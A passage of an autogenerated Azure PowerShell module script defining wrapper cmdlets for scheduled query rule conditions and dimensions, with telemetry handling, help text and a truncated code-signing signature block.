begin {
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) {
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString()
}
$preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
if ($preTelemetryId -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString()
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet)
} else {
$internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
if ($internalCalledCmdlets -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name
} else {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal'
}
$mapping = @{
UpdateExpanded = 'Az.ScheduledQueryRule.private\Update-AzScheduledQueryRule_UpdateExpanded';
UpdateViaIdentityExpanded = 'Az.ScheduledQueryRule.private\Update-AzScheduledQueryRule_UpdateViaIdentityExpanded';
}
if (('UpdateExpanded') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) {
$testPlayback = $false
$PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } }
if ($testPlayback) {
$PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1')
} else {
$PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id
}
}
$cmdInfo = Get-Command -Name $mapping[$parameterSet]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name)
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
finally {
$backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
$backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
}
end {
try {
$steppablePipeline.End()
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets
if ($preTelemetryId -eq '') {
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
}
<#
.Synopsis
Create an in-memory object for Condition.
.Description
Create an in-memory object for Condition.
.Example
$dimension = New-AzScheduledQueryRuleDimensionObject -Name Computer -Operator Include -Value *
New-AzScheduledQueryRuleConditionObject -Dimension $dimension -Query "Perf | where ObjectName == `"Processor`" and CounterName == `"% Processor Time`" | summarize AggregatedValue = avg(CounterValue) by bin(TimeGenerated, 5m), Computer" -TimeAggregation "Average" -MetricMeasureColumn "AggregatedValue" -Operator "GreaterThan" -Threshold "70" -FailingPeriodNumberOfEvaluationPeriod 1 -FailingPeriodMinFailingPeriodsToAlert 1
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Condition
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
DIMENSION <IDimension[]>: List of Dimensions conditions.
Name <String>: Name of the dimension
Operator <DimensionOperator>: Operator for dimension values
Value <String[]>: List of dimension values
.Link
https://learn.microsoft.com/powershell/module/Az.Monitor/new-AzScheduledQueryRuleConditionObject
#>
function New-AzScheduledQueryRuleConditionObject {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Condition])]
[CmdletBinding(PositionalBinding=$false)]
param(
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IDimension[]]
# List of Dimensions conditions.
# To construct, see NOTES section for DIMENSION properties and create a hash table.
${Dimension},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Int64]
# The number of violations to trigger an alert.
# Should be smaller or equal to numberOfEvaluationPeriods.
# Default value is 1.
${FailingPeriodMinFailingPeriodsToAlert},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Int64]
# The number of aggregated lookback points.
# The lookback time window is calculated based on the aggregation granularity (windowSize) and the selected number of aggregated points.
# Default value is 1.
${FailingPeriodNumberOfEvaluationPeriod},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The column containing the metric measure number.
# Relevant only for rules of the kind LogAlert.
${MetricMeasureColumn},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The name of the metric to be sent.
# Relevant and required only for rules of the kind LogToMetric.
${MetricName},
[Parameter()]
[ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.ConditionOperator])]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.ConditionOperator]
# The criteria operator.
# Relevant and required only for rules of the kind LogAlert.
${Operator},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# Log query alert.
${Query},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The column containing the resource id.
# The content of the column must be a uri formatted as resource id.
# Relevant only for rules of the kind LogAlert.
${ResourceIdColumn},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Double]
# the criteria threshold value that activates the alert.
# Relevant and required only for rules of the kind LogAlert.
${Threshold},
[Parameter()]
[ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.TimeAggregation])]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.TimeAggregation]
# Aggregation type.
# Relevant and required only for rules of the kind LogAlert.
${TimeAggregation}
)
begin {
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) {
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString()
}
$preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
if ($preTelemetryId -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString()
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet)
} else {
$internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
if ($internalCalledCmdlets -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name
} else {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal'
}
$mapping = @{
__AllParameterSets = 'Az.ScheduledQueryRule.custom\New-AzScheduledQueryRuleConditionObject';
}
$cmdInfo = Get-Command -Name $mapping[$parameterSet]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name)
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
finally {
$backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
$backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
}
end {
try {
$steppablePipeline.End()
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets
if ($preTelemetryId -eq '') {
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
}
<#
.Synopsis
Create an in-memory object for Dimension.
.Description
Create an in-memory object for Dimension.
.Example
New-AzScheduledQueryRuleDimensionObject -Name Computer -Operator Include -Value *
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Dimension
.Link
https://learn.microsoft.com/powershell/module/Az.Monitor/new-AzScheduledQueryRuleDimensionObject
#>
function New-AzScheduledQueryRuleDimensionObject {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Dimension])]
[CmdletBinding(PositionalBinding=$false)]
param(
[Parameter(Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# Name of the dimension.
${Name},
[Parameter(Mandatory)]
[ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.DimensionOperator])]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.DimensionOperator]
# Operator for dimension values.
${Operator},
[Parameter(Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# List of dimension values.
${Value}
)
begin {
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) {
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString()
}
$preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
if ($preTelemetryId -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString()
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet)
} else {
$internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
if ($internalCalledCmdlets -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name
} else {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal'
}
$mapping = @{
__AllParameterSets = 'Az.ScheduledQueryRule.custom\New-AzScheduledQueryRuleDimensionObject';
}
$cmdInfo = Get-Command -Name $mapping[$parameterSet]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name)
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
finally {
$backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
$backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
}
end {
try {
$steppablePipeline.End()
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets
if ($preTelemetryId -eq '') {
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
}
# SIG # Begin signature block
# MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDdj6cNrqC/hfny
# ZY8TvdNJVx2AheO3seELbWyTAODZO6CCDYUwggYDMIID66ADAgECAhMzAAADri01
# UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG
# yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899
# QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82
# 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV
# M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd
# WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W
# 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY
# 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV
# APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37
# ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57
# xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t
# Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i
# 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk
# 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK
# 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO
# zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA
# A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEINAS
# hU6Z2oJfgjDXoKSWbZn7Ug8by4gQaVc3VC0rjx31MEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAO6ovVjHwQbvwlQgZyNmFAqM4GPQh2J+9uGR7
# Z3X/WZHl8L6hOTPOfBXo483B55UAUrkH2gLxP7g4HxBpSPHoM7lBblVS77BhvegL
# Hr84+4szSI9kI+Bd+z8JjK8uii34Hqm5lefjIAMa5SPN050e5ssE7MZOgbTu62P3
# sCAtk5GWKh7wa/oaPCPL8x2WmBFelB64YKsoAXv5ZY9+bxZ/WVjOEKkAAkrxyoS6
# 0rFyIMcs/Xc7A8YMzQW3McxhCqvSQ3RpL+9bJ2NYHFlCf5MkSh0brYUjsJEny/55
# EZ/u/duH7FdEATV+wJ4dHLgDjw0Aue+gvTb+Ag0zO9uGQ+myqaGCF5QwgheQBgor
